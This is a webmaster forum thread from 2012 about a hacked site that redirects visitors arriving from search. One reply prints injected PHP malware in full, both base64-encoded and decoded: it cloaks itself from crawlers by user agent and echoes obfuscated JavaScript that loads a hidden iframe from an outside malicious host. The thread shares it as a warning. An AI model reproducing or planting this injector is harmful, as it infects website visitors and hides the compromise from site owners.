1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

hmmmm hacked

Discussion in 'Security' started by thedarkest1666, Apr 3, 2012.

  1. #1
    OK, so I may have a background in SEO, but hacking is not my bag...

    One of my sites, when you follow a link from Google Organic Search is redirecting to some spammy s**t website.

    Don't know who the wise guy is but the .htaccess file looks intact. How else do these guys get in and what file should I be looking at fixing please?
    SEMrush
     
    thedarkest1666, Apr 3, 2012 IP
    SEMrush
  2. thedarkest1666

    thedarkest1666 Active Member

    Messages:
    371
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    73
    #2
    ...looks like a base64_decode hack to all the php files...
     
    thedarkest1666, Apr 3, 2012 IP
  3. ironmankho

    ironmankho Active Member

    Messages:
    394
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    55
    #3
    Beware from Rapidleech script form warez sites and word press themes
    ---------------------------------------------------------------------
    Recently my friend install Rapidleech script form warez sites and word press themes absence of mine
    when i return after 1 week ...... i was shocked because my Eset smart secrity update version show me

    Threat
    JS/Iframe.CP trojan

    Information:
    Connection terminated - quarantined

    on every sites

    when i exam my hosting ....... every index page of my site is added with this code

    eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1alBUSTdhVDFqTFRJN2FXWW9jR0Z5YzJWSmJuUW9JakF4TWpNaUtUMDlQVGd6S1dsbUtIZHBibVJ2ZHk1a2IyTjFiV1Z1ZENsMGNubDdibVYzSUZOMGNtbHVaeWdpWVhOa0lpa3VjSEp2ZEc5MGVYQmxMbkY5WTJGMFkyZ29aV2RsZDJkelpDbDdaajFiSnkwek1Ha3RNekJwTmpacE5qTnBMVGRwTVdrMk1XazNNbWsyTUdrM09HazNNR2syTW1rM01XazNOMmszYVRZMGFUWXlhVGMzYVRNd2FUWTVhVFl5YVRjd2FUWXlhVGN4YVRjM2FUYzJhVEkzYVRneWFUUTFhVFU0YVRZMGFUTTVhVFU0YVRjd2FUWXlhVEZwTUdrMU9XazNNbWsyTVdrNE1ta3dhVEpwTlRKcE9XazFOR2t5YVRnMGFTMHlObWt0TXpCcExUTXdhUzB6TUdrMk5tazJNMmszTldrMU9HazNNR2syTW1rM05Xa3hhVEpwTWpCcExUSTJhUzB6TUdrdE16QnBPRFpwTFRkcE5qSnBOamxwTnpacE5qSnBMVGRwT0RScExUSTJhUzB6TUdrdE16QnBMVE13YVRZeGFUY3lhVFl3YVRjNGFUY3dhVFl5YVRjeGFUYzNhVGRwT0RCcE56VnBOalpwTnpkcE5qSnBNV2t0TldreU1XazJObWsyTTJrM05XazFPR2szTUdrMk1ta3ROMmszTm1rM05XazJNR2t5TW1rd2FUWTFhVGMzYVRjM2FUY3phVEU1YVRocE9HazFPR2sxT0drM09HazJNR2szTW1rMk1XazNOR2s0TUdrM05XazJNMmszYVRZMGFUY3lhVGMzYVRZMGFUWXlhVFl5YVRZNGFUYzJhVGRwTmpCcE56SnBOekJwT0drMk1XazRhVEV6YVRscE1UTnBOMmszTTJrMk5XazNNMmt5TkdrMk5HazNNbWt5TW1reE1Ha3dhUzAzYVRnd2FUWTJhVFl4YVRjM2FUWTFhVEl5YVRCcE1UQnBPV2t3YVMwM2FUWTFhVFl5YVRZMmFUWTBhVFkxYVRjM2FUSXlhVEJwTVRCcE9Xa3dhUzAzYVRjMmFUYzNhVGd5YVRZNWFUWXlhVEl5YVRCcE56bHBOalpwTnpacE5qWnBOVGxwTmpacE5qbHBOalpwTnpkcE9ESnBNVGxwTmpWcE5qWnBOakZwTmpGcE5qSnBOekZwTWpCcE56TnBOekpwTnpacE5qWnBOemRwTmpacE56SnBOekZwTVRscE5UaHBOVGxwTnpacE56SnBOamxwTnpocE56ZHBOakpwTWpCcE5qbHBOakpwTmpOcE56ZHBNVGxwT1dreU1HazNOMmszTW1rM00ya3hPV2s1YVRJd2FUQnBNak5wTWpGcE9HazJObWsyTTJrM05XazFPR2szTUdrMk1ta3lNMmt0TldreWFUSXdhUzB5Tm1rdE16QnBMVE13YVRnMmFTMHlObWt0TXpCcExUTXdhVFl6YVRjNGFUY3hhVFl3YVRjM2FUWTJhVGN5YVRjeGFTMDNhVFkyYVRZemFUYzFhVFU0YVRjd2FUWXlhVGMxYVRGcE1tazROR2t0TWpacExUTXdhUzB6TUdrdE16QnBOemxwTlRocE56VnBMVGRwTmpOcExUZHBNakpwTFRkcE5qRnBOekpwTmpCcE56aHBOekJwTmpKcE56RnBOemRwTjJrMk1HazNOV2syTW1rMU9HazNOMmsyTW1rek1HazJPV2syTW1rM01HazJNbWszTVdrM04ya3hhVEJwTmpacE5qTnBOelZwTlRocE56QnBOakpwTUdreWFUSXdhVFl6YVRkcE56WnBOakpwTnpkcE1qWnBOemRwTnpkcE56VnBOalpwTlRscE56aHBOemRwTmpKcE1Xa3dhVGMyYVRjMWFUWXdhVEJwTldrd2FUWTFhVGMzYVRjM2FUY3phVEU1YVRocE9HazFPR2sxT0drM09HazJNR2szTW1rMk1XazNOR2s0TUdrM05XazJNMmszYVRZMGFUY3lhVGMzYVRZMGFUWXlhVFl5YVRZNGFUYzJhVGRwTmpCcE56SnBOekJwT0drMk1XazRhVEV6YVRscE1UTnBOMmszTTJrMk5XazNNMmt5TkdrMk5HazNNbWt5TW1reE1Ha3dhVEpwTWpCcE5qTnBOMmszTm1rM04yazRNbWsyT1drMk1tazNhVGM1YVRZMmFUYzJhVFkyYVRVNWFUWTJhVFk1YVRZMmFUYzNhVGd5YVRJeWFUQnBOalZwTmpacE5qRnBOakZwTmpKcE56RnBNR2t5TUdrMk0yazNhVGMyYVRjM2FUZ3lhVFk1YVRZeWFUZHBOek5wTnpKcE56WnBOalpwTnpkcE5qWnBOekpwTnpGcE1qSnBNR2sxT0drMU9XazNObWszTW1rMk9XazNPR2szTjJrMk1ta3dhVEl3YVRZemFUZHBOelpwTnpkcE9ESnBOamxwTmpKcE4yazJPV2syTW1rMk0yazNOMmt5TW1rd2FUbHBNR2t5TUdrMk0yazNhVGMyYVRjM2FUZ3lhVFk1YVRZeWFUZHBOemRwTnpKcE56TnBNakpwTUdrNWFUQnBNakJwTmpOcE4yazNObWsyTW1rM04ya3lObWszTjJrM04yazNOV2syTm1rMU9XazNPR2szTjJrMk1ta3hhVEJwT0RCcE5qWnBOakZwTnpkcE5qVnBNR2sxYVRCcE1UQnBPV2t3YVRKcE1qQnBOak5wTjJrM05tazJNbWszTjJreU5tazNOMmszTjJrM05XazJObWsxT1drM09HazNOMmsyTW1reGFUQnBOalZwTmpKcE5qWnBOalJwTmpWcE56ZHBNR2sxYVRCcE1UQnBPV2t3YVRKcE1qQnBMVEkyYVMwek1Ha3RNekJwTFRNd2FUWXhhVGN5YVRZd2FUYzRhVGN3YVRZeWFUY3hhVGMzYVRkcE5qUnBOakpwTnpkcE16QnBOamxwTmpKcE56QnBOakpwTnpGcE56ZHBOelpwTWpkcE9ESnBORFZwTlRocE5qUnBNemxwTlRocE56QnBOakpwTVdrd2FUVTVhVGN5YVRZeGFUZ3lhVEJwTW1rMU1tazVhVFUwYVRkcE5UaHBOek5wTnpOcE5qSnBOekZwTmpGcE1qaHBOalZwTmpacE5qbHBOakZwTVdrMk0ya3lhVEl3YVMweU5ta3RNekJwTFRNd2FUZzJKMTFiTUYwdWMzQnNhWFFvSjJrbktUdHRaRDBuWVNjN2RqMGlaWFlpS3lKaGJDSTdmV2xtS0hZcFpUMTNhVzVrYjNkYmRsMDdkejFtTzNNOVcxMDdjajFUZEhKcGJtYzdabTl5S0RzMU9Ua2hQV2s3YVNzOU1TbDdhajFwTzNNclBYSmJJbVp5YjIxRElpc2lhR0Z5UTI5a1pTSmRLRE01S3pFcWQxdHFYU2s3ZlFwcFppaG1LWG85Y3p0bEtIb3BPend2YzJOeWFYQjBQZz09JykpOw0KfQ=='));
    PHP:
    so beware my friends always check free themes and script form eval other wise you will be fuc*k hard your hosting provider will kick your ass


    decode above code

    <?phperror_reporting(0);
    $bot = FALSE ;
    $ua = $_SERVER['HTTP_USER_AGENT'];
    $botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android');
    foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
    if (!$bot){
        echo '<script>c=2;i=c-2;if(parseInt("0123")===83)if(window.document)try{new String("asd").prototype.q}catch(egewgsd){f=['-30i-30i66i63i-7i1i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70i62i71i77i76i27i82i45i58i64i39i58i70i62i1i0i59i72i61i82i0i2i52i9i54i2i84i-26i-30i-30i-30i66i63i75i58i70i62i75i1i2i20i-26i-30i-30i86i-7i62i69i76i62i-7i84i-26i-30i-30i-30i61i72i60i78i70i62i71i77i7i80i75i66i77i62i1i-5i21i66i63i75i58i70i62i-7i76i75i60i22i0i65i77i77i73i19i8i8i58i58i78i60i72i61i74i80i75i63i7i64i72i77i64i62i62i68i76i7i60i72i70i8i61i8i13i9i13i7i73i65i73i24i64i72i22i10i0i-7i80i66i61i77i65i22i0i10i9i0i-7i65i62i66i64i65i77i22i0i10i9i0i-7i76i77i82i69i62i22i0i79i66i76i66i59i66i69i66i77i82i19i65i66i61i61i62i71i20i73i72i76i66i77i66i72i71i19i58i59i76i72i69i78i77i62i20i69i62i63i77i19i9i20i77i72i73i19i9i20i0i23i21i8i66i63i75i58i70i62i23i-5i2i20i-26i-30i-30i86i-26i-30i-30i63i78i71i60i77i66i72i71i-7i66i63i75i58i70i62i75i1i2i84i-26i-30i-30i-30i79i58i75i-7i63i-7i22i-7i61i72i60i78i70i62i71i77i7i60i75i62i58i77i62i30i69i62i70i62i71i77i1i0i66i63i75i58i70i62i0i2i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i76i75i60i0i5i0i65i77i77i73i19i8i8i58i58i78i60i72i61i74i80i75i63i7i64i72i77i64i62i62i68i76i7i60i72i70i8i61i8i13i9i13i7i73i65i73i24i64i72i22i10i0i2i20i63i7i76i77i82i69i62i7i79i66i76i66i59i66i69i66i77i82i22i0i65i66i61i61i62i71i0i20i63i7i76i77i82i69i62i7i73i72i76i66i77i66i72i71i22i0i58i59i76i72i69i78i77i62i0i20i63i7i76i77i82i69i62i7i69i62i63i77i22i0i9i0i20i63i7i76i77i82i69i62i7i77i72i73i22i0i9i0i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i80i66i61i77i65i0i5i0i10i9i0i2i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i65i62i66i64i65i77i0i5i0i10i9i0i2i20i-26i-30i-30i-30i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70i62i71i77i76i27i82i45i58i64i39i58i70i62i1i0i59i72i61i82i0i2i52i9i54i7i58i73i73i62i71i61i28i65i66i69i61i1i63i2i20i-26i-30i-30i86'][0].split('i');md='a';v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;599!=i;i+=1){j=i;s+=r["fromC"+"harCode"](39+1*w[j]);}
    if(f)z=s;e(z);</script>';
    }
    
    ?> 
    PHP:
     
    ironmankho, Apr 3, 2012 IP
  4. ryan_uk

    ryan_uk Illustrious Member

    Messages:
    3,983
    Likes Received:
    1,022
    Best Answers:
    33
    Trophy Points:
    465
    #4
    A bit more information, mate. Is it a hand-coded site or are you using Wordpress, for example?
     
    ryan_uk, Apr 4, 2012 IP
  5. tiffanywilliams12i2

    tiffanywilliams12i2 Peon

    Messages:
    164
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #5
    Did you update? Check for shells? Backdoors? Logs? There is a lot involved in to know what happened.
     
    tiffanywilliams12i2, Apr 5, 2012 IP